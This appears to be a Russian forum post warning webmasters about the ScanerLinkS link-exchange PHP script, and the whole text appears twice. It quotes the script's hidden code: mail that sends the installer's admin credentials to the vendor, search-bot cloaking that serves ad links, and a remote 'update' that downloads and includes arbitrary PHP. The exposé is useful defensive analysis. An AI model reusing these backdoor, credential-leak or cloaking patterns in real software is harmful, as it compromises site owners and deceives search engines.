Jerry
тот самый Учиха
- Реакции
- 514
- Автор темы
Как то сделав очередно сайт, поленился писать свой соответствующий скрипт для обмена ссылками (немаловажная деталь в продвижении ресурса). Имеющийся на данный момент меня не устравал. Решил купить. Порыскав по интернету наткнулся на сканерлинк. Почитал ФАК, возможности скрипта - всё устаивало. в особенности это: "Открытый PHP код!". В титлах сайта (добавьте ru к топику темы - увидите сами).
------
<meta name="Title" content="ScanerLinkS - скачать ОТКРЫТЫЙ Скрипт Oбмена ссылками :: www scanerlink ru">
И
<title>ScanerLinkS - скачать ОТКРЫТЫЙ Скрипт Oбмена ссылками :: www scanerlink ru</title>
------
Вобщем автор лжёт код там не открытый. Применена "защита" нулевыми байтами в некоторых файлах (кажется в трёх, обнаружив это запустил парсер он у меня её и снял).
Ещё, в скрипте есть такие строчки:
------
$header = "From: ScanerLinkS <not-reply@scanerlink.ru>";
$header .= "\nContent-Type: text/plain; charset=windows-1251\n";
$header .= "X-Mailer: RoboGeneric\n";
$header .= "Return-Path: not-reply@scanerlink.ru\n";
# include("codes/config.php");
$w1=(Login);
$w2=(Pass);
$mail_congrat = <<<End
Здравствуйте!
Поздравляем Вас с успешной установкой каталога для
обмена ссылками ScanerLink! Надеемся, что данный
скрипт поможет Вам в нелегком труде раскрутки сайта.
Просим сообщать нам о всех неточностях в работе Вашего
каталога. Это поможет нам оперативно устранить
неисправность работы скрипта и выпустить обновленную версию.
Ваши данные для доступа в админ-панель:
Сайт: $myhost
Логин: $w1
Пароль: $w2
Спасибо за Ваш выбор!
Команда разработчиков ScanerLinkS.
http ScanerLink .ru / (в этой строке чуть редактнул УРЛ)
End;
------
Т.е. ВАШИ пароли, уважаемые пользователи скрипта, отсылаются автору.
И любые письма, то же попадают к автору.
Обратите внимание:
-------
В соседнем топике Sergey (HL) автор сего чуда развода бахвалился своей базой вебмастеров. Становиться понятно, откуда она у него.
Для просмотра ссылки Войдиили Зарегистрируйся
Хотя, на сайте автора (в /faq.php) написано обратное, дескать:
---- (в самом низу) ---
Q: Передает ли скрипт какую-либо информацию с моего сервера разработчику? A: Скрипт не закодирован - смотрите сами
----
Опять же, намёк на "открытые исходники" (ложь) + ещё одна ложь.
Ещё:
Ограничено время работы скрипта
<?php (time()>1993456000)?exit('Script Expired''';
Т.е. через некоторое время он попросту перестанет работать.
Ещё:
------------
if($versd != "30.08.041")
{
$err_msg = "<br><li style='color:red'>КАТАЛОГ РАБОТАЕТ С ОШИБКАМИ !<br>СООБЩИТЕ, ПОЖАЛУЙСТА, АДМИНИСТРАТОРУ (e-mail <a href=mailto:".my_data(my_email).">".my_data(my_email)."</a>), ЧТО НЕОБХОДИМО СДЕЛАТЬ ПОЛНОЕ ОБНОВЛЕНИЕ ВЕРСИИ СКРИПТА !";
}
------
Причём, эта строка выдаётся юзеру, заходящему в ваш каталог, а вы даже об этом и не знаете. Наверное это сделано, чтобы постоянно быть привязанным к автору скрипта, наверняка он денег прости, за устраниение этой "неполадки". Крохобор
--------
Ещё, по всему коду щедро рассыпаны проверки на запуск скрипта "локально" примерно такого вида:
-----
if($ip_a!='127.0.0.1')
{
$mess_to_user .= "\n\n=============================================\nВаш ресурс проверен в автоматическом режиме\nплатным скриптом обмена ссылками ScanerLinkS http scanerlink ru /\n";
}
------
А как вам нравиться вот это:
-------------
...
else if(getenv("REMOTE_ADDR")!='127.0.0.1')
{
$fp = @fsockopen("scanerlink.ru", 80, $errno, $errstr, 30);
if ($fp)
{
if((substr($useragent, 0, 12) == "StackRambler") or (substr($useragent, 0, 9) == "Googlebot") or (substr($useragent, 0, 6) == "Yandex") or (substr($useragent, 0, 5) == "Aport") or (substr($useragent, 0, 6) == "msnbot"))
{
$posagent = 1;
}
$recsl = 'http://scanerlink.ru/scanerlink/reclama.php?posagent='.$posagent;
$recslp = file_get_contents($recsl);
$post_link = $recslp;
fclose($fp);
}
...
--------
ПРЯМОЕ НАРУШЕНИЕ ЛИЦЕНЗИИ Я и других поисковиков. Технология клоакинг называется. Хитропопый Автор за Ваш счёт (за счёт ваших ресурсов) рекламит свои (а возможно и чужие) ресурсы. Т.е. если заходит юзер (или вы) - рекламных ссылок нет, а при заходе поисковика скрипт выдаёт рекламную ссылку.
За подобную ерунду сайты по первому стуку конкуренто вылетают из поиска.
Уважаемые пользователи сканерлинка:
Ваш сайт ещё не забанен? Или забанен, но вы не знаете причины???
------ Загрузка чего угодно на ваш сайт (троянов???) -------
if(getenv("REMOTE_ADDR")!='127.0.0.1')
{
$fp = @fsockopen("scanerlink.ru", 80, $errno, $errstr, 10);
if ($fp)
{
$fldl = "http://scanerlink.ru/scanerlink/updates/".$myhost.".upd";
$file_array = @file($fldl);
if($file_array)
{
copy($fldl,"update.php");
include("update.php");
}
fclose($fp);
}
}
################
}
------------------
В последнее время участились взломы сайтов, не в том ли одна из причин?
Вобщем там много всего. Это всё выявлено при поверхностном изучении.
И при чём тут заявление автора о:
------
QUOTE Там есть смешные темы от блондинок, мы их рассматриваем, и увы, удалить ни как не можем. А вы чего боитесь?
Если вы серьёзно пострадали, то плиз - арбитраж вебмани.
Мы рассмоштрим ваши убытки и предложим коспенсчацию ещё до решения арбитража. Если конечно вы не кидала, высасывающий из пальца.
А бодягу и словоблудство разводить это вам плиз на те форумы, где я не отвечаю.
И
QUOTE Чего только стоило заявлен6ие о спаме по клиентской базе. Там 200 чел, а по одному линкообменнику у меня 15 тыс чел, а по другому 20 тыс чел.
И Я ЭТО НЕ ПРОДАЮ ДЛЯ СВОИХ РАССЫЛОК (только предустановка базы на скрипт - покупать у меня не советую, проспамить сложно). А сам шлю едва ли не раз в квартал. Больше слать не чего. А полтом граждане грозяться в арбитраж вебмани подать, потому что к им не пришёл _бесплатный_ патч.
------
Посмотрите внимательно мои сообщения, и его. Думаю понятно станет, кто такой автор. Это он явно сам придумал. Прежде чем что то поставить из _купленного_ в инете начинаю изучать скурпулёзно. Этот скрипт по понятным причинам даже и не ставил.
------
<meta name="Title" content="ScanerLinkS - скачать ОТКРЫТЫЙ Скрипт Oбмена ссылками :: www scanerlink ru">
И
<title>ScanerLinkS - скачать ОТКРЫТЫЙ Скрипт Oбмена ссылками :: www scanerlink ru</title>
------
Вобщем автор лжёт код там не открытый. Применена "защита" нулевыми байтами в некоторых файлах (кажется в трёх, обнаружив это запустил парсер он у меня её и снял).
Ещё, в скрипте есть такие строчки:
------
$header = "From: ScanerLinkS <not-reply@scanerlink.ru>";
$header .= "\nContent-Type: text/plain; charset=windows-1251\n";
$header .= "X-Mailer: RoboGeneric\n";
# include("codes/config.php");
$w1=(Login);
$w2=(Pass);
$mail_congrat = <<<End
Здравствуйте!
Поздравляем Вас с успешной установкой каталога для
обмена ссылками ScanerLink! Надеемся, что данный
скрипт поможет Вам в нелегком труде раскрутки сайта.
Просим сообщать нам о всех неточностях в работе Вашего
каталога. Это поможет нам оперативно устранить
неисправность работы скрипта и выпустить обновленную версию.
Ваши данные для доступа в админ-панель:
Сайт: $myhost
Логин: $w1
Пароль: $w2
Спасибо за Ваш выбор!
Команда разработчиков ScanerLinkS.
http ScanerLink .ru / (в этой строке чуть редактнул УРЛ)
End;
------
Т.е. ВАШИ пароли, уважаемые пользователи скрипта, отсылаются автору.
И любые письма, то же попадают к автору.
Обратите внимание:
-------
В соседнем топике Sergey (HL) автор сего чуда развода бахвалился своей базой вебмастеров. Становиться понятно, откуда она у него.
Для просмотра ссылки Войди
Хотя, на сайте автора (в /faq.php) написано обратное, дескать:
---- (в самом низу) ---
Q: Передает ли скрипт какую-либо информацию с моего сервера разработчику? A: Скрипт не закодирован - смотрите сами
----
Опять же, намёк на "открытые исходники" (ложь) + ещё одна ложь.
Ещё:
Ограничено время работы скрипта
<?php (time()>1993456000)?exit('Script Expired''';
Т.е. через некоторое время он попросту перестанет работать.
Ещё:
------------
if($versd != "30.08.041")
{
$err_msg = "<br><li style='color:red'>КАТАЛОГ РАБОТАЕТ С ОШИБКАМИ !<br>СООБЩИТЕ, ПОЖАЛУЙСТА, АДМИНИСТРАТОРУ (e-mail <a href=mailto:".my_data(my_email).">".my_data(my_email)."</a>), ЧТО НЕОБХОДИМО СДЕЛАТЬ ПОЛНОЕ ОБНОВЛЕНИЕ ВЕРСИИ СКРИПТА !";
}
------
Причём, эта строка выдаётся юзеру, заходящему в ваш каталог, а вы даже об этом и не знаете. Наверное это сделано, чтобы постоянно быть привязанным к автору скрипта, наверняка он денег прости, за устраниение этой "неполадки". Крохобор
--------
Ещё, по всему коду щедро рассыпаны проверки на запуск скрипта "локально" примерно такого вида:
-----
if($ip_a!='127.0.0.1')
{
$mess_to_user .= "\n\n=============================================\nВаш ресурс проверен в автоматическом режиме\nплатным скриптом обмена ссылками ScanerLinkS http scanerlink ru /\n";
}
------
А как вам нравиться вот это:
-------------
...
else if(getenv("REMOTE_ADDR")!='127.0.0.1')
{
$fp = @fsockopen("scanerlink.ru", 80, $errno, $errstr, 30);
if ($fp)
{
if((substr($useragent, 0, 12) == "StackRambler") or (substr($useragent, 0, 9) == "Googlebot") or (substr($useragent, 0, 6) == "Yandex") or (substr($useragent, 0, 5) == "Aport") or (substr($useragent, 0, 6) == "msnbot"))
{
$posagent = 1;
}
$recsl = 'http://scanerlink.ru/scanerlink/reclama.php?posagent='.$posagent;
$recslp = file_get_contents($recsl);
$post_link = $recslp;
fclose($fp);
}
...
--------
ПРЯМОЕ НАРУШЕНИЕ ЛИЦЕНЗИИ Я и других поисковиков. Технология клоакинг называется. Хитропопый Автор за Ваш счёт (за счёт ваших ресурсов) рекламит свои (а возможно и чужие) ресурсы. Т.е. если заходит юзер (или вы) - рекламных ссылок нет, а при заходе поисковика скрипт выдаёт рекламную ссылку.
За подобную ерунду сайты по первому стуку конкуренто вылетают из поиска.
Уважаемые пользователи сканерлинка:
Ваш сайт ещё не забанен? Или забанен, но вы не знаете причины???
------ Загрузка чего угодно на ваш сайт (троянов???) -------
if(getenv("REMOTE_ADDR")!='127.0.0.1')
{
$fp = @fsockopen("scanerlink.ru", 80, $errno, $errstr, 10);
if ($fp)
{
$fldl = "http://scanerlink.ru/scanerlink/updates/".$myhost.".upd";
$file_array = @file($fldl);
if($file_array)
{
copy($fldl,"update.php");
include("update.php");
}
fclose($fp);
}
}
################
}
------------------
В последнее время участились взломы сайтов, не в том ли одна из причин?
Вобщем там много всего. Это всё выявлено при поверхностном изучении.
И при чём тут заявление автора о:
------
QUOTE Там есть смешные темы от блондинок, мы их рассматриваем, и увы, удалить ни как не можем. А вы чего боитесь?
Если вы серьёзно пострадали, то плиз - арбитраж вебмани.
Мы рассмоштрим ваши убытки и предложим коспенсчацию ещё до решения арбитража. Если конечно вы не кидала, высасывающий из пальца.
А бодягу и словоблудство разводить это вам плиз на те форумы, где я не отвечаю.
И
QUOTE Чего только стоило заявлен6ие о спаме по клиентской базе. Там 200 чел, а по одному линкообменнику у меня 15 тыс чел, а по другому 20 тыс чел.
И Я ЭТО НЕ ПРОДАЮ ДЛЯ СВОИХ РАССЫЛОК (только предустановка базы на скрипт - покупать у меня не советую, проспамить сложно). А сам шлю едва ли не раз в квартал. Больше слать не чего. А полтом граждане грозяться в арбитраж вебмани подать, потому что к им не пришёл _бесплатный_ патч.
------
Посмотрите внимательно мои сообщения, и его. Думаю понятно станет, кто такой автор. Это он явно сам придумал. Прежде чем что то поставить из _купленного_ в инете начинаю изучать скурпулёзно. Этот скрипт по понятным причинам даже и не ставил.